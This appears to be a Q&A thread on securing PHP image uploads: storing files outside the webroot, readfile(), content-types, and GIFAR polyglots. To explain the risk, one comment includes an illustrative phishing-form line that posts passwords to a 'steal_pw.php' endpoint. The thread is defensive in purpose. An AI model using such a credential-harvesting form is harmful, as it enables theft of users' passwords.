# PHP Image Upload - Security of storing outside root and accessing via readfile()

Tags: php, file-upload

I recently began storing image uploads outside the webroot and retrieving them via readfile(). I implemented this and it's working fine, but I was curious if there are any further vulnerabilities that still exist in this method.

If I take the contents of a malicious script from outside the web-root via readfile() and output it on a php script that has an image content-type will this force the browser to always interpret this data as an image or is there some way a user could circumvent this and use it to run a malicious script?

Answer (score 3):

Reading the file from outside the webroot with readfile(), it won't be able to run a malicious script *on the server*.

Providing the proper content-type means that it won't be mishandled as something else in *most* cases.

However, there are still some cases such as [Gifar](https://en.wikipedia.org/wiki/Gifar) where a polyglot content is provided in a way that can affect the user (these are actually problems in Java or Flash, but breaking the same-origin), so you should check that the content really *is* what it to be, and it *is not* one of certain undesirable formats (for instance, zip-based formats are quite problematic).

Answer (score 1):

Storing outside the document root and using `readfile()` is a great way to protect the server.

Additionally, to protect the client, don't serve HTML files verbatim (always send a `Content-Type: text/plain`), or else you'll open the door for phishing attacks. (I'm not sure if the security vernacular has a precise term for this; it's close enough to a watering hole attack, but involves phishing emails to a URL on your server that directs the user to the attacker's server when they supply their credentials.)

Comment: I'm by no means a security expert. Could you elaborate on serving HTML files as text/plain for security? Does that just involve changing a <meta> tag?

Comment: Look up the `header()` function.

Comment: Sorry, perhaps I was unclear. I'm familiar with setting headers and content-types, but I'm asking, is it just as simple as changing that - are there any adverse affects of serving HTML documents as plain-text? Will it cause any abnormal Javascript/CSS/etc mishaps?

Comment: As I'm searching, I cannot find the security implications of serving HTML as plain-text, it seems to only be brought up as an error or fault.  This is why I'm a bit confused, have never heard of this method and just need some more insight please.

Comment: It's simple: Instead of your browser rendering it as a web page, the user will see the source code as if they were viewing a text file. I don't know if this has been published anywhere but I have a blog post on securing file uploads.

Comment: I'm confused. If you're sending it as plain text, how do they see the page content rather than the markup?

Comment: They don't. That's what you're trying to prevent. If I upload a .HTML file that looks like a login page but `<form action="https://mysite.com/steal_pw.php" method="post" />` then only displaying the markup as plain text prevents this from being used to phish people.

Comment: Oh, I see what you're saying. I only allow image uploads, so wouldn't displaying all uploaded files with an image content-type effectively prevent them from being rendered as anything harmful?

Comment: Modulo an exploit in libpng, libtiff, or whatever's on the client side? Yes. :)